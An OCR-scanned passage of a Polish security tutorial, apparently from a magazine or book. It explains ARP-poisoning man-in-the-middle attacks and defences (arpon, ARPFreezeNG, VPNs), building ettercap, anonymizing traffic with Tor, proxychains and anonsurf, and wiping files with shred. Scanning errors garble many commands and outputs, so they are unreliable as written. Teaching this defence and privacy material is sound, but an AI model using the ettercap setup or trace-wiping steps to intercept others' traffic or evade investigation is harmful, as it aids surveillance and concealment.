Do routera wysyła pakiety mó- 
wiące, że ma adres 2.2.2.2, a do 
maszyny testowej, że ma adres 
1.1.1.1. W wyniku takiego dzia- 
łania jest w stanie przechwycić 
cały ruch, a inne urządzenia 
w sieci twierdzą, że wszystko 
przebiega prawidłowo. 


| dRo 


AB 
Dowiedzieliśmy się, jak 
wygląda atak mający na celu 
przechwycenie komunikacji 92 


w naszej sieci domowej. Wła- , ; EG 
ściwie skuteczność przechwy- Wygląd tablicy w trakcie ataku ARP Poisoning. Wtym przypadku 
tywania opiera się na wykona- od razu widać, że atak wykonuje urządzenie, które ma adres IP 
niu ataku MITM. Musimy więc 192.168.1.111. W trakcie ataku wszystkie pakiety mają tylko 
uniemożliwić atakującemu za- jedną drogę do komunikacji z urządzenia poddanego atakowi 


truwanie tablicy ARP. 
W zależności od tego, z jakiego systemu Blokujemy zatruwanie ARP w systemie 
korzystamy, możemy skorzystać z różnego Linux 

rodzaju narzędzi, które pozwolą na zabloko- W Terminalu wpisujemy polecenie sudo 
wanie takiego ataku lub bardzo szybko nas apt install arpon © w celu zainstalowa- 
o nim poinformują. nia narzędzia arpon. 

Korzystając z komendy sudo arp -a lub 
arp a w systemie Windows, możemy spraw- 
dzić aktualną tablicę ARP. 


krzysiekGkali:-$ sudo apt install arpon 
Czytanie list pakietów... Gotowe 
Budowanie drzewa zależności 
Odczyt informacji o stanie... Gotowe 
The following additional packages will be installed: 
Libdumbnet1 
Zostaną zainstalowane następujące NOWE pakiety: 
arpon Libdumbnetl 
© aktualizowanych, 2 nowo instalowanych, 6 usuwanych i 45 
Konieczne pobranie 58,4 kB archiwów. 
Po tej operacji zostanie dodatkowo użyte 194 kB miejsca na 
Kontynuować? [T/n] rj] 


1. 
1. 
1. 
z 
ż 
+ 
> 
i. 
1. 


Następnie wykonujemy komendę sudo 
arpon -D -i [interfejs_sieciowy] LJ. 
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krzysiekGkali:-$ sudo arpón Eb -i wlane 
Jan 09 12:29:16 [INFO] Start DARPI on wlan© 
Jan 09 12:29:16 [INFO] CLEAN, 192.168.1.100 was at 00:d0:cb:00:00:05 on wlanQ 
Jan 09 12:29:16 [INFO] CLEAN, 192.168.1.100 was at 00:d0:cb:00:00:05 on wlanQ 
Jan 069 12:29:16 [INFO] CLEAN, 192.168.1.150 was al 60:45:cb:12:3b:18 on wlanQ 
Jan 09 12:29:16 [INFO] CLEAN, 192.168.1.112 was at 18:d6:c7:0b:cc:b4 on wlane 
Jan 09 12:29:17 [INFO] ALLOW, 192.168.1.112 is at 18:d6:c7:b:cc:b4 on wlane 
Jan 69 12:29:18 [INFO] ALLOW, 192.168.1.1060 is at 0:d0:cb:0:0:5 on wlane 
Jan 69 12:29:22 [INFO] ALLOW, 192.168.1.112 is at 18:d6:c7:b:cc:b4 on wlane 
Jan 69 12:29:23 [INFO] DENY, 192.168.1.100 was at 0:d0:cb:0:0:5 on wlanQ 
an 09 12:31:47 [INFO] DENY, 192.168.1.110 was at 4c:ed:de:a4:a:63 on wlanQ 
Jeśli zostaniemy zaatakowani, FE ARPFreezeNG 0.02 from Irongeek.com 
zaczną pojawiać się komunika- | EL ]Intezface: 152.168.1.112 —- 0xa 
ty DENY 6 informujące o odmowie j-HQ1s2.160.1.100 YO, ee 
R ; d A : Ń ...|]1s2.168.1.101 50-ec-50-12-20-ea dynamic 
zmiany wpisu w ynamicznej tablicy. Ę [/]1s2.168.1.102 ac-84-c6-3f-9e-5c dynamic 
fe. 192.168.1.105 28-$e-cd-05-4b-3b d: ic 
4 mami 
Możemy uruchomić program do JSGIOR a wa naa. DE 
Ź 8 ad- -le dynami 
pracy w tle - wystarczy dodać do AGR GEREWA  RDERE 
polecenia parametr -d: 18-d€-c]-0b-cc-b4 dynamic 
sudo arpon -D -i [interfejs_siecio- i 60-45-cb-12-3b-18 _ dynamic 
152.168.1.255 ff-ff-ff-ff-ff-ff static 
wy] -d 
|g2) 224.0.0.2 01-00-5e-00-00-02 static 
01-00-5e-00-00-16 static 
Blokowanie zmian tablicy odby- 01-00-5e-00-00-5b static 
wa się automatycznie. apfajcfogojkiwoie 
01-00-5e-7f-ff-fa static 
ff-ff-ff-ff-ff-ff static 
Blokujemy zatruwanie ARP w sys- 
temie Windows 
Pobieramy z KS+ program ARP- Appl ear Al Refresh V 
FreezeNG, wypakowujemy go 
z archiwum © i uruchamiamy. = 
E: ARPFreezeNG 0.02 from Irongeek.com 
B < arpfreezeng > arpfreczeNG [Ej [L|Interface: 152.168.1.112 —— 0xa 
i 152.168.1.100 00-d0-ch-00-00-05 static 
Nacz ij 182.168.1.101 50-ec-50-13-20-0a static 
p S2.168.1.102 ac-84-c6-3f-9e-5c static 
+ B source 92.168.1.105 28-fe-cd-05-4b-3b static 
FL arpfreezeng 152.168.1.10€ 00-d8-61-c3-Be-la static 
* [| 152.168.1.108 a4-34-d9-50-e6-le static 
152.168.1.110 4c-ed-de-a4-0a-63 static 
: . LI 192.168.1.111 18-d6-c7-0b-cc-b4 dynamic 
Następnie zaznaczamy wszystkie asa RON Sz. 
znane nam urządzenia SIECIOWE fE-fi-fI-fE-fI-fE static 
i klikamy na Apply 01-00-5e-00-00-02 static 
01-00-5e-00-00-16 static 
Dzięki temu wszystkie wpis rafsdiczji coz 
ę Y a pisy 01-00-5e-00-00-5c static 
dla wybranych urządzeń w ta- 01-00-5e-Tf-fi-fa _ static 
blicy ARP na naszym urządzeniu ...|2]255.255.255.255 FE-FE-FE-FE-FE-FE _ static 
z Windows zostaną zmienione z dy- 
namicznych na statyczne (przypisane 
na stałe) Appły Clear Al Refresh View 
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jak chronić się przed podsłuchem w sieci lokalnej 


Przy takiej konfiguracji atak MITM 

z zatruwaniem ARP będzie nie- BREE 
możliwy. Po jego uruchomieniu ża- JESZE 
den wpis w tablicy ARP nie zostanie 
zmieniony 


Dodatkowo jeśli zamierzamy korzy- 
stać z sieci otwartych, w przypadku 
systemu Linux blokada zmiany dy- 


|Randomizing 255 hosts for scanning... 
|Scanning the whole netmask for 255 hosts... 
/O hosts added to the hosts list... 


A 


krzysiekGkali:-$ sudo apt-get install debhelper bison check cmake flex ghostscript libbsd-dev 
libcurl4-openssl-dev libgeoip-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev li 
bpcap-dev libpcre3-dev libssl-dev libgtk-3-dev libgtk2.8-dev 

Czytanie list pakietów... Gotowe 

Budowanie drzewa zależności 


Odczyt informacji o stanie... Gotowe 

krzysiekękat1:-5 sudo apt-get purge --auto-remove = 
zytanie list pakietów... Gotowe 

Budowanie drzewa zależności 

Odczyt informacji o stanie... Gotowe 


Następujące pakiety zostaną USUNIĘTE: 

ettercap-common* kali-linux-default* libapache2-mod-php* libluajit-5.1-2* 
libluajit-5.1-common* nginx* python-paramiko* python-pefile* python-qrcode* 
set* 

aktualizowanych, © nowo instalowanych, 16 usuwanych i 45 nieaktualizowanych. 
po tej operacji zostanie zwolnione 55,3 MB miejsca na dysku. 
ontynuować? [T/n] 
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namicznej tablicy będzie skuteczna i nas 
ochroni. W przypadku systemu Windows 
nie możemy liczyć na taką ochronę. Dlatego 
też wtedy najlepiej korzystać z dodatkowych 
programów, które umożliwiają komunikację 
VPN. Jest ona bardzo dobrze zabezpieczona 
i nie da się jej podsłuchać, nawet jeśli ata- 
kujący przechwyci część naszych pakietów. 
Jeżeli mamy dostęp do panelu zarządzania 


Enterprise Explore Marketplace 


(wg) why GitHub? 


Pricing 


routera, możemy również wprowadzić ogól- 
ny statyczny routing z poziomu routera. Po- 
woduje to pewne utrudnienia, gdyż za każ- 
dym razem, gdy chcemy podłączyć nowe 
urządzenie, musimy dokonać tego ręcznie 
- jest to dość skomplikowany proces i nie jest 
zalecany. Jednak odpowiednio skonfiguro- 
wany routing statyczny pozwala na ochronę 
przed atakiem ARP. 


Sign in | Sign up 


IJEttercap / ettercap 


© Code 52 Pull reque 4 P ts 0 


Ettercap Project http;//www.ettercap-project.org 


© 2,978 b $ bra U "0; 


Branch: master 


PT 


m or 


© Watch 106 Star  ldk YVrork 378 


Find file 


hasło 
Built 
Built 
Built 
Built 
Built 


[sudo] 


krzysiekGkali:-/ettercap/build$ sudo make install 


użytkownika krzysiek: 
target ec interfaces 
target libnet 

target lib ettercap 
target ettercap 
target stp mangler 


krzysiekGkali:-/ettercap/build$ sudo ettercap --version 


ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team 
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Jak zapewnić sobie 
prywatność 


w internecie 


Każdy z nas korzysta z internetu. Wiele zagadnień 
bezpieczeństwa jest bezpośrednio powiązanych z samym 
połączeniem się z siecią i przesyłaniem pakietów danych. Warto 
wiedzieć, jak zachować anonimowość zarówno w sieci lokalnej, 
jak i internecie. Dzięki poradom z tego rozdziału cyberprzestępcy 


nie namierzą nas w internecie 


krycie naszej tożsamości w sieci to dość 
trudne zadanie. Adres IP to tylko jeden 

z elementów pozwalających nas zidentyfi- 

kować, a jest ich znacznie więcej - na przy- 

kład adres MAC karty sieciowej czy wcześniej 
zarejestrowane konta online, do których się 
logujemy. Dlatego też jeśli chcemy zadbać 

o ochronę naszej prywatności w sieci, po- 

winniśmy stosować się do kilku zasad: 

m Cały ruch sieciowy naszego urządzenia 
musi być tunelowany przez VPN lub TOR, 
nie wystarczy ukrycie się tylko wewnątrz 
przeglądarki, ponieważ system, na przy- 
kład wysyłając dane diagnostyczne, może 
zdradzić naszą prawdziwą lokalizację. 

m Należy zmienić adres MAC karty sieciowej, 
aby nie można było namierzyć nas po jej 
domyślnym adresie sprzętowym. 

m Ważne jest również, aby nie logować się do 
kont społecznościowych ani do żadnych 
innych kont, do których logowaliśmy się 
przed zapewnieniem sobie anonimowości 
- takie logowania łatwo powiązać z kon- 
kretną osobą. 

Uwaga! Po zapewnieniu sobie anonimowości 

nie logujemy się również do banku - taka próba 

może zostać automatycznie zablokowana przez 
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bankowe systemy ochronne jako potencjalna 
próba włamania. (Jeśli musimy dostać się do 
konta bankowego, korzystając z publicznego 
Wi-Fi, najlepiej skorzystać z serwera VPN zlo- 
kalizowanego w Polsce). 


TRUDNE POJĘCIA 


m Adres MAC - sprzętowy adres karty 

sieciowej w sieciach standardu Ether- 
net i Token Ring, unikatowy w skali 
światowej, nadawany przez producen- 
ta danej karty podczas jej produkcji. 
Najczęściej spotkać można się z zapi- 
sem heksadecymalnym, na przykład: 
11:22:33:44:55:66. Pierwsze 24 bity 
oznaczają producenta — w tym przy- 
padku 11:22:33, ostatnie 24 bity są 
unikatowym identyfikatorem karty 
nadanym przez producenta - w tym 
przypadku jest to 44:55:66. 
Proxy - serwer pośredniczący, 
oprogramowanie lub serwer z odpo- 
wiednim oprogramowaniem, którego 
zadaniem jest nawiązywanie połączeń 
w imieniu użytkownika. 
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TOR - sieć, która pozwoli ukryć się w sieci 


J est to przykład sieci anonimowej, która 
podobnie jak inne, typu Freenet, GNU- 
net czy MUTE, ma za zadanie chronić naszą 
tożsamość w internecie. Głównym celem 
wykorzystywania takich sieci jest chęć 
ominięcia narzędzi cenzury, mechanizmów 
filtrowania sieci i różnego typu ograniczeń 
w komunikacji. 

Sama sieć TOR oparta jest na zasadzie trasowa- 
nia cebulowego. Nazwa tego mechanizmu bie- 
rze się z tego, że wykorzystując kryptografię, 
wielowarstwowo (stąd porównanie do cebuli) 
szyfrowane są wszystkie przesyłane komunika- 
ty. Przechodzą one następnie przez ciąg róż- 
nego typu serwerów - routerów cebulowych, 
które nie sprawdzają, jakie dane przesyłają. 


Działanie sieci TOR 


P okazane poniżej schematy są tylko pew- 
nym zarysem i mają za zadanie przed- 
stawić podstawowe zasady działania sieci 


Sieć TOR odniosła bardzo duży 

sukces dzięki prostej implemen- 

tacji, jasnym zasadom działania 

i temu, że skutecznie zapewnia 
prywatność - umożliwia całkowite zniknięcie 
w internecie. (W teorii możliwe jest wpraw- 
dzie wyśledzenie użytkownika i potwierdzenie 
komunikacji wychodzącej i przychodzącej do 
jego komputera, jednak wymaga to ogrom- 
nych środków i zaplecza technologicznego; 
uważa się, że takie środki mogą być stoso- 
wane w USA, gdzie rząd może kontrolować 
jednocześnie węzeł początkowy i końcowy, 
kluczowe dla całej komunikacji, ale w przypad- 
ku innych państw potwierdzenie wystąpienia 
komunikacji jest praktycznie niemożliwe). 


w praktyce 


TOR. Tak naprawdę cały proces jest znacz- 
nie bardziej skomplikowany i zawiera więcej 
elementów. 


NORMALNE POŁĄCZENIE BEZ SIECI TOR 


AU 


Dostawca internetu widzi: 


nasze IP: 83.123.231.32 
IP strony: 232.12.231.42 
godzinę: 19.42 


Nasz komputer 
IP: 83.123.231.32 


Strona WWW widzi: 
nasze IP: 
83.123.231.32 
godzinę 19.42 


Inicjujemy połączenie z internetem z komputera, chcemy odwiedzić stronę X. Wpisujemy jej adres 
w przeglądarce. Jest on przez nią rozpoznawany. Przeglądarka wysyła żądanie dostępu do adresu 
IP serwera danej witryny. Żądanie jest przesyłane do naszego dostawcy internetu wraz ze stemp- 
lem czasowym- dostawca wie, o której godzinie żądanie wyszło z jakiego adresu IP i do jakiego IP 
docelowego chcemy dotrzeć. Przesyłane przez nas pakiety, nawet takie, które zawierają hasła 

i wrażliwe dane, są przechowywane na serwerach naszych dostawców internetu. 
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jak zapewnić sobie prywatność w internecie 


POŁĄCZENIE Z WYKORZYSTANIEM SIECI TOR 


ŚŚ 


Nasz komputer 
IP: 83.123.231.32 


Dostawca internetu widzi: 
nasze IP: 83.123.231.32 
IP sieci Tor: EJ 
godzinę: 19.42 


7 


+, + 
* + 


Węzły sieci TOR 
IP: każdy węzeł ma indy- 
widualne IP 


Strona WWW widzi: 
IP sieci Tor: EA 
godzinę: 19.42 


Tutaj sytuacja wygląda zupełnie inaczej. Całe żądanie dostępu do danej witryny jest szyfrowane 

i przesyłane do węzła początkowego. Nasz dostawca wie tylko, o której godzinie z naszego adresu 
został wygenerowany pakiet wychodzący, jednak nie może sprawdzić treści tego pakietu i z infor- 
macji, jakie ma, może wywnioskować tylko tyle, że ruch tego pakietu kończy się w pierwszym węźle. 


W rzeczywistości trasa naszego pakietu jest 
znacznie dłuższa i przebiega przez wcześniej 
ustalony pseudolosowy szereg węzłów, co 
pozwala na zwiększenie bezpieczeństwa 
i utrudnienie śledzenia. Dopiero ostatni wę- 
zeł, czyli węzeł końcowy, otrzymuje informa- 
cję pozwalającą na odszyfrowanie naszego 
pakietu i przesłanie go w „normalny” sposób 
do docelowego serwera. Serwer może od- 


czytać pakiet i zna tylko czas dostępu oraz 
adres IP ostatniego węzła, a nie nasz. Właś- 
nie dzięki temu jesteśmy anonimowi, gdyż 
nawet dostawca internetu nie jest w stanie 
stwierdzić, na jakie strony wchodzimy i jakie 
dane przesyłamy czy pobieramy z sieci. Jedy- 
ne, co rejestruje, to godziny czasu dostępu 
i ilość transmitowanych danych niezbędnych 
do rozliczenia klienta. 


Anonimowy dostęp do sieci dzięki 
proxychains i sieci TOR 


iemy już, że 

dostęp do sieci 
z wykorzystaniem 
sieci TOR pozwoli 
nam na uzyskanie 
anonimowości. Naj- 
prostszym rozwiąza- 
niem byłoby skorzy- 


proxychains(1) 


NAME 
ProxyChains - 


[SYNTAX 


DESCRIPTION 
This 


proxychains <program> 


follow through proxy (or proxy chain). 


krzysiek(gdkali: — 


proxychains(1) 


redirect connections through proxy servers 


program forces any tcp connection made by any given tcp client to 


It is a kind of proxifier. 


stanie z przeglądarki 
TOR Browser, która nawiązuje bezpieczne 
połączenie, cały ruch wewnątrz niej jest za- 
bezpieczony. Jednak wszystkie inne programy 
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w naszym systemie, które korzystają z sieci, 
mogą zdradzić nasz prawdziwy adres. Z po- 
mocą przychodzi program proxychains 
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krzysiekekali:-$ sudo apt-get install tor 


Czytanie list pakietów... Gotowe 
Budowanie drzewa zależności 


Odczyt informacji o stanie... Gotowe 


Następujące pakiety zostały zainstalowane automatycznie i nie są już więcej wyma 


Jgane: 
libayatana-ido3-0.4-0 libbfiol 


Aby je usunąć należy użyć "sudo apt autoremove". 
The following additional packages will be insralled: 


tor-geoipdb torsocks 
Sugerowane pakiety: 


mixmaster torbrowser-launcher tor-arm apparmor-utits obfs4proxy 
Zostaną zainstalowane następujące NOWE pakiety: 


tor tor-geoipdb torsocks 


(0 aktualizowanych, 3 nowo instalowanych, © usuwanych i 47 nieaktualizowanych. 


Konieczne pobranie 3 368 kB archiwów. 


Po tej operacji zostanie dodatkowo użyte 13,8 MB miejsca na dysku. 


Kontynuować? [T/n] |] 


Wykorzystuje on protokół pośredniczący 
TCP - SOCKS do przesyłania dalej pakietów 
sieciowych. Jeśli odpowiednio skonfiguru- 
jemy proxychains do pracy z siecią TOR, 
otrzymamy idealne połączenie - wszystkie 
pakiety sieciowe aplikacji uruchomionych 
przez proxy będą przesyłane przez proxy do 
sieci TOR. 


Instalujemy proxychains 

i narzędzie TOR 
Sprawdzamy, czy mamy zainstalowany 
program proxychains. Uruchamiamy 

krzysiekekali:-$ proxychains LN 


ProxyChains-3.1 (http://proxychains.sf.net) 
usage: 


7 w 


proxychains <prog> [args [-] 
krzysiekekali:-$ |] 


Terminator, wpisujemy i zatwierdzamy po- 
lecenie proxychains LE]. 


2. nie pojawi się wpis [E], musimy za- 
instalować program ręcznie. W takim 
wypadku wpisujemy i zatwierdzamy pole- 
cenie - sudo apt-get install proxychains 


Następnie instalujemy narzędzie TOR, 
wpisując polecenie: sudo apt-get in- 
stall tor atwierdzamy instalację, wcis- 


kając klawisz [7] i [zie]. 


Uruchamiamy usługę TOR 

Narzędzie TOR działa w tle, dlatego też nie 
ma żadnego interfejsu graficznego. Nie uru- 
chamiamy go również tak jak innych progra- 
mów w systemie Linux. 


WYSZUKIWANIE PLIKÓW W TERMINALU 


W systemie Linux często musimy szukać 
różnego rodzaju plików konfiguracyjnych 
lub folderów z narzędziami potrzebnymi 
do testowania, takimi jak listy czy 
słowniki. Możemy w tym celu korzystać 
z narzędzia wyszukiwania w Menedżerze 
plików, podobnie jak robimy to w Win- 
dows, jednak znacznie szybciej działa 
narzędzie szukania w Terminalu - find. 


Składnia polecenia jest dość prosta. 
Po komendzie find podajemy zasób, 
w jakim chcemy szukać, następnie po 
frazie -żname podajemy w cudzysłowie 
wyrażenie, którego szukamy. Oto jak 
za pomocą polecenia find znaleźć pliki 
programu proxychains: 

sudo find / -name „*proxychains. 
conf*” 


krzysiekGkali:-$ sudo find / -name "*proxychains.conf*" 
/var/Llib/dpkg/info/proxychains.conffiles 
/etc/proxychains.conf 
krzysiekGkali:-$ 
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krzysiekfkali:-$ sudo service tor status 

le tor.service - Anonymizing overlay network for TCP (multi-instance-master) 
loaded (/lib/systemd/system/tor.service; disabled; vendor preset: | 
active (exited) sincc Mon 2019 12 23 12:28:04 CET; lmin 31s ago 
1/695 kExecStart=/bin/true (code=exited, status=0/SUCCESS) 

17695 (code=exited, status=0/SUCCESS) 


Loaded: 
Active: 
Process: 
Main PID: 


Lines 1-8/8 (END) 


gru 23 12:28:04 kali systemd[1]: Starting Anonymizing overlay network for TCP (Ę 
gru 23 12:28:04 kali systemd[1]: Started Anonymizing overlay network for TCP (mg 


W celu rozpoczęcia korzystania z narzędzia 
TOR musimy uruchomić usługę samej sieci, 
korzystając z polecenia service. 


Wpisujemy w Terminalu polecenie sudo 
service tor start ©. 


krzysiekEkali:-$ sudo service tor start 


[sudo] hasło użytkownika krzysiek: 


Po chwili wpisujemy również polecenie 
sudo service tor status, aby sprawdzić, 
czy usługa została prawidłowo uruchomiona. 


Usługa jest aktywna, jeśli w linii Active 
jest wpis active (exited) 


Konfigurujemy proxychains 
do pracy z narzędziem TOR 
W systemie Linux programy działające w Ter- 
minalu swoje pliki konfiguracyjne mają za- 
pisane w plikach tekstowych. Dokładnie 


pliku konfiguracyjnego i „odkomentowu- 
jemy” (usuwamy + z początku linii) wpis 
socks4 127.0.0.1 9050 [.1. 


Następnie zachowujemy zmiany i zamy- 
kamy edytor tekstu Mousepad. 
Ten wpis w konfiguracji oznacza, że chcemy, 
aby po uruchomieniu proxychains cały ruch 
przechodził przez protokół socks4 na porcie 
9050 (jest to domyślny port narzędzia TOR). 


Korzystamy z proxychains i TOR 

Po konfiguracji i uruchomieniu usługi TOR 
możemy przystąpić do korzystania z proxy- 
chains. Poniższe kroki wykonujemy dla każ- 
dej aplikacji, której ruch sieciowy chcemy 
kierować przez sieć TOR. 


Wpisujemy w Terminalu polecenie pro- 
xychains [aplikacja], na przykład pro- 
xychains firefox ©- 


tak jest w przypadku proxychains. 
Musimy znaleźć ten plik, a następnie 
go wyedytować. 


krzysiekękali:-$ proxychains firefox 
ProxyChains-3.1 (http://proxychains.st.net) 
|DNS-request| detectportal.firefox.com 
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-0K 
|DNS-request| www.kali.org 


Wpisujemy w Terminalu polecenie 
mousepad /etc/proxychains.conf 
i zatwierdzamy. 


rzysiek©kali:-$ mousepad /etc/proxychains.conf 
rzysiekgkali:-$ |] 
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Zostanie uruchomiony edytor tekstowy 
Mousepad. Przechodzimy na sam koniec 


[ProxyList] 

ft add proxy here 

ft meanwile 

"tor" 
127.0.0.1 9050 [Ą 


ft defaults set to 


socks4 
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Cały ruch sieciowy aplikacji Firefox jest 
kierowany przez sieć TOR. Możemy 
sprawdzić nasz adres IP ©, by przekonać się, 
czy rzeczywiście jesteśmy anonimowi w sieci. 


WhatlsMylP.com «a 


My IP Address Information is 


My Public IPv4 is: 18.27.197.252 


Location: Cambridge, MA USG 


ISP: Massachusetts Institute of Technology 


Hide my IP information with a VPN 


adam1l3zajac(gmail.com 


SZYBKA ZMIANA ADRESU IP W SIECI TOR 


Jeśli chcemy zmienić nasz zewnętrzny ad- 


nAi ; WJ WhatlsMylP.con 
res IP, wystarczy wpisać jedno polecenie (©) wnatisuylP.com 
w Terminalu. 


Wpisujemy i zatwierdzamy polecenie My IP Address Information is: 


sudo service tor restart My Public IPv4 is: 185.220.101.72 


rzysiekękali:-$ sudo service tor restart 
sudo] hasło użytkownika krzysick: 
rzysiekękali:-$ 


Location: Amsterdam, NH NL © 
ISP: Zwiebelfreunde E.V. 


Po chwili nasz adres IP zostanie zmie- Hide my IP inlormaton wilh a VPN 
niony 


Anonsurf: anonimowość 
dla całego systemu 


A nonsurf to specjalny skrypt, który zadba Uruchamiamy Terminal i wykonujemy 
o naszą anonimowość. Korzysta z sieci polecenie git clone https://github. 
TOR, I2P, tablic IP i pozwala na anonimizację _ com/Und3rf10w/kali-anonsurf.git 
całego systemu. Nie jest tak stabilny w działa- 
niu jak proxychains, ale zapewnia komplek- 
sową ochronę całego systemu. Nie wymaga 
uruchamiania z ochroną każdego programu 
z osobna - wszystko odbywa się automatycznie. 
Uwaga! W celu korzystania z anonsurf mu- 
simy wcześniej zainstalować narzędzie TOR. 


Przechodzimy do nowo utworzonego 

folderu ed kali-anonsurf, wykonujemy 
polecenie chmod a+x ./installer.sh, a na- 
stępnie sudo ./installer.sh. Po wykonaniu 
tych komend w naszym systemie zostanie 
zainstalowane narzędzie anonsurf 


JkrzysiekeGkali:-$ git clonc https://github.com/undzżrf1low/kali anonsurf.git 

Cloning into 'kali-anonsurf'... 

remote: Enumerating objects: 321, done. 

remote: Total 321 (delta 8), reused Q (delta 0), pack-reused 321 

Receiving objects: 85% (273/321), 148.01 KiB | 256Receiving objects: 86% (277/321), 148.01 KiB | 256R 
eceiving objects: A7% (280/321), 148.01 KiB | 256Receiving objects: 88% (283/321), 148.01 KiB | 256Re 
ceiving objects: 89% (286/321), 148.01 KiB | 256Receiving objects: 90% (289/321), 148.01 KiB | 256Rec 
eiving objects: 91% (293/321), 148.01 KiB | 256Recciving objects: 92% (296/321), 148.01 KiB | 256Rece 
living objects: 93% (299/321), 148.61 KiB | 256Receiving objects: 94% (302/321), 148.61 KiB | 256Recei 
wing objects: 95% (305/321), 148.01 KiB | 256Recciving objects: 96% (309/321), 148.01 KiB | 256Rcecciv 
ing objects: 97% (312/321), 148.61 KiB | 256Receiving objects: 98% (315/321), 148.01 KiB | 256Receivi 
ng objects: 99% (318/321), 148.01 KiB | 256Receiving objects: 100% (321/321), 148.01 KiB | 256Receivin 
gg objects: 100% (321/321), 167.72 KiR | 299.60 KiR/s, done. 

Resolvinq deltas: 100% (99/99), done. 

krzysiekękali:-5 |] 


ddpkg-deb: budowanie pakietu "kali-anonsurf" w "kali-anonsurf.deb". 
bieranie wcześniej niewybranego pakietu kali-anonsurf. 
(Odczytywanie bazy danych ... 279309 plików i katalogów obecnie zainstalowanych.) 
Przygotowywanie do rozpakowania pakietu kali-anonsurf.deb ... 
Rozpakowywanie pakietu kali-anonsurt (1.2.2.2) ... 
Konfigurowanie pakietu kali-anonsurt (1.2.2.2) ... 
Przetwarzanie wyzwalaczy pakietu systemd (7244-3)... 
krzysiekgkali: -/kali-anonsurf$ | | 
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krzysiekGkali: 


zysiek i /home/krzysi kali-anonsurf|] 


- $ anon tart | stop | res LEEJELCIATEN 


start - Start sy 
tunnelin 
stop - Reset 
and ret 
restart - Combines 
change - Changes i 
status - if 
myip - Show your curre 
----[ I2P related featu 
starti2p - Start i2p servi 
stopi2p 


krzysiekGkali: 


Teraz po wpisaniu 

w Terminalu polece- 
nia anonsurf pojawi się iang 
wpis z programu anon- 
surf z instrukcją działa- 
nia 


:-/kali-anonsurf$ sudo anonsurf start 


W celu uruchomie- 
nia skryptu wpisu- 
jemy polecenie sudo 
anonsurf start 6. Usłu- 
ga zostanie uruchomio- 


na i cały ruch sieciowy :-/kali-anonsurf$ |] 
naszego systemu będzie 
kierowany przez bezpieczną sieć TOR. W każdej chwili możemy zatrzymać dzia- 


łanie tej usługi, wpisując w Terminalu 
Nasz nowy adres IP możemy sprawdzić, _ polecenie sudo anonsurf stop 
wpisując polecenie anonsurf myip 


= :-/kali-anonsurf$ sudo anonsurf stop 
/kali-anonsurf$ anonsurf my1ip 


My ip is: 


89.163.143.8 


:-/kali-anonsurf$ sudo anonsurf change 


Z kolei poleceniem sudo anonsurf chan- 
ge © zmieniamy nasz adres IP na nowy, 


wybierany losowo z puli dostępnych węzłów. OOWOZWYNCE 
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Usuwamy ślady aktywności z komputera 


W: pamiętać, że jeśli 
chcemy pozostać całko- 
wicie anonimowi, to w kompu- 
terze nie powinniśmy zostawiać 
śladów naszej aktywności. Oso- 
ba, która uzyskałaby do niego 
dostęp, mogłaby wiele się do- 
wiedzieć z pozostawionych 
danych. Samo wyczyszczenie 
historii przeglądarki to może 
być za mało. W zależności od 
tego, jak bardzo „czysty” system 
chcemy po sobie pozostawić, 
możemy wykonać kilka różnych 


x): 
Nowa karta Ctrl+T 
Nowe okno Ctrl+N 
Nowe okno incognito Ctrl+ Shift+ N 
Historia , 
Pobrane pliki CuleJ 
Zakładki > 
Powiększ - 100% + 
oodle = = 
Przesyłaj.. 
Znajdź Ctrl+F 
Edytuj Wytnij Kopiuj Wklej 
Wyczyść dane przeglądania...  Ctrl+Shift+Del Ustawienia 
Rozszerzenia Pomoc > 
Menedżer zadafi Shift+Esc Zakończ 


działań. 
Oczywiście po pierwsze - czyścimy historię 
przeglądarki w standardowy sposób. W przy- 
padku Chrome klikamy na ikonę trzech kro- 
pek w prawym górnym rogu, przechodzimy 
do Więcej narzędzi i klikamy na Wyczyść 
dane przeglądania ©. 

Następnie korzystamy z narzędzia shred 
Służy ono do wielokrotnego nadpisywania 
wskazanych plików różnymi metodami. Po 
wykonaniu całej procedury odzyskanie usu- 
niętych przez narzędzie plików jest praktycz- 
nie niemożliwe nawet przy wykorzystaniu 


on zapisany na naszym dysku, to korzystając 
ze zwykłej komendy rm (remove - usunię- 
cie) tak naprawdę usuniemy tylko wskaźnik 
do tego pliku i będzie można go odzyskać 
(chyba że zostanie nadpisany). A jeśli skorzy- 
stamy z komendy shred, na naszym dysku 
nie zostanie ślad po tym konkretnym pliku. 


Korzystamy z narzędzia shred 
Uruchamiamy Terminator i przechodzi- 
my do folderu z plikiem, który chcemy 

na stałe usunąć 


bardzo drogich 


narzędzi. razem 5254040 

21: ż -rw-r--r-- 1 krzysiek krzysiek 
Jeśli WIĘC NA |-ry-y--1-- 1 krzysiek krzysiek 
przykład pobie- |drwxr-xr-x 3 krzysiek krzysiek 


drwxr-xr-x 2 krzysiek 
-rw-r--r-- 1 krzysiek 
krzysiekękali:-/Pobrane$ |] 


raliśmy z sieci 
jakiś plik i jest 


krzysiek© kali: — 


krzysiekekali:-/Pobrane$ ls -l 


krzysiek 
krzysiek 5317847040 


kiwka 


User Commands 


98418 
62181264 
4096 
4096 


lut 27 26809 
gru 20 16:08 
gru 20 11:33 
gru 20 11:58 
gru 17 15:26 


google.deb 
'Pliki do testowania' 


] 103x24 


apache-user-enum-2.0.txt 


'System Volume Information" 
Win16 1909 Polish x64.iso 


SHRED (1) SHRED (1) 
NAME 

shred - overwrite a file to hide its contents, and optionally delete it 
SYNOPSIS 


shred [OPTION]... FILE... 


DESCRIPTION 
overwrite the specificd FILE(5) repcatedly, in order to make it harder for cven very cexpen 
sive hardware probing to recover the data. 
If FILE is -, shred standard output. 


Mandatory arguments to long options are mandatory for short options too. 
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2 chcemy bezpowrotnie usunąć plik 
google.deb, wpisujemy i zatwierdzamy 
polecenie shred -zu google.deb 


krzysiekGkali:-/Pobrane$ shred -zu google.deb 


W tym przypadku skorzystaliśmy z kilku 

opcji, z - ostatnie nadpisanie pliku wyko- 
nywane jest tylko zerami, u - po nadpisaniu 
plik jest dealokowany i przenoszony. Jeśli 
dodamy również opcję v, będziemy mogli 
obserwować pracę narzędzia shred i ilość 
wykonanych operacji 


krzysiekokali:-/Pobrane$ shred -vzu apache-use! -emm-2.0. txt 
shredz 
shred: 
jshredz 
shredz 
shred: 
shred: 
isnred: 
shred: 
snred: 
shreń: 
shreń: 
shred: 
shred: 
Ishred* 
